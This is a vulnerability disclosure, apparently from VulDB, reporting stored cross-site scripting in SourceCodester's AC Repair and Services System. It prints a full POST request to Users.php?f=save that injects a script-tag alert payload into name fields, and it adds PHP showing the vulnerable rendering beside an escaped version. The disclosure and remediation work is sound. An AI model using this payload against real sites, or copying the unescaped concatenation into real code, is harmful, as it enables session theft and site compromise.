Submit #180834: SourceCodester AC Repair and Services System Users.php cross site scripting info

Title: SourceCodester AC Repair and Services System Users.php cross site scripting
Description: I discovered an XSS vulnerability in SourceCodester AC Repair And Services System (https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html). It is in url/classes/Users.php?f=save.

    POST /php-acrss/classes/Users.php?f=save HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------248310740335140400871461243690
    Content-Length: 1077
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/php-acrss/admin/?page=user/manage_user
    Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin

    -----------------------------248310740335140400871461243690
    Content-Disposition: form-data; name="id"

    1
    -----------------------------248310740335140400871461243690
    Content-Disposition: form-data; name="firstname"

    <ScRipt>alert(1)</ScRipt>
    -----------------------------248310740335140400871461243690
    Content-Disposition: form-data; name="middlename"

    <ScRipt>alert(1)</ScRipt>
    -----------------------------248310740335140400871461243690
    Content-Disposition: form-data; name="lastname"

    123
    -----------------------------248310740335140400871461243690
    Content-Disposition: form-data; name="username"

    123
    -----------------------------248310740335140400871461243690
    Content-Disposition: form-data; name="password"

    123
    -----------------------------248310740335140400871461243690
    Content-Disposition: form-data; name="type"

    2
    -----------------------------248310740335140400871461243690
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream


    -----------------------------248310740335140400871461243690--

This is a stored XSS vulnerability: anyone who accesses url/php-acrss/admin/?page=user/list will receive pop-up windows, because the XSS code is concatenated directly into the page source. The repair method is to filter parameters such as username once, for characters such as < and >, etc.
Source: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User: fushuling (UID 45488)
Submission: 07/11/2023 18:14 (3 years ago)
Moderation: 07/13/2023 11:49 (2 days later)
Status: Accepted
VulDB entry: 234013 [SourceCodester AC Repair and Services System 1.0 manage_user firstname/middlename cross site scripting]
Points: 20
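The fix the submission describes, as an added illustration that is not code from the submission or from the SourceCodester project: the user-list row is rendered once the way the report says it is (the stored field concatenated straight into HTML) and once with output encoding, and the save handler gets an input-side check. All function and variable names are hypothetical, and the sample row is constructed from the values in the request above.

```php
<?php
// Added example, not code from the SourceCodester project or the submission.
// Function and variable names are hypothetical.

// Constructed sample row, as it would sit in the database after the
// Users.php?f=save request from the report stored the unfiltered fields.
$storedUser = [
    'id'         => 1,
    'firstname'  => '<ScRipt>alert(1)</ScRipt>',
    'middlename' => '<ScRipt>alert(1)</ScRipt>',
    'lastname'   => '123',
    'username'   => '123',
];

// Vulnerable pattern: the stored value is concatenated straight into the
// HTML of the user list, so every admin who opens the list runs the payload.
function renderUserRowVulnerable(array $u): string
{
    return '<tr><td>' . $u['firstname'] . ' ' . $u['middlename'] . ' '
        . $u['lastname'] . '</td><td>' . $u['username'] . '</td></tr>';
}

// Hardened pattern: encode every untrusted value for the HTML context at
// output time. ENT_QUOTES also covers attribute contexts; UTF-8 is passed
// explicitly so the encoder does not depend on the default charset setting.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderUserRowSafe(array $u): string
{
    return '<tr><td>' . h($u['firstname']) . ' ' . h($u['middlename']) . ' '
        . h($u['lastname']) . '</td><td>' . h($u['username']) . '</td></tr>';
}

// Input-side check for the save handler, the "filter once" the report asks
// for: a name field has no legitimate need for angle brackets, so reject
// them. Output encoding above stays the primary control; this is defence in depth.
function nameFieldIsAcceptable(string $name): bool
{
    return $name !== '' && strlen($name) <= 100 && !preg_match('/[<>]/', $name);
}

echo renderUserRowVulnerable($storedUser), PHP_EOL;
echo renderUserRowSafe($storedUser), PHP_EOL;
var_dump(nameFieldIsAcceptable($storedUser['firstname']));
```

The second rendered row carries the payload as literal text (`&lt;ScRipt&gt;...`) rather than as markup, and the check rejects the submitted firstname before it is ever stored.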
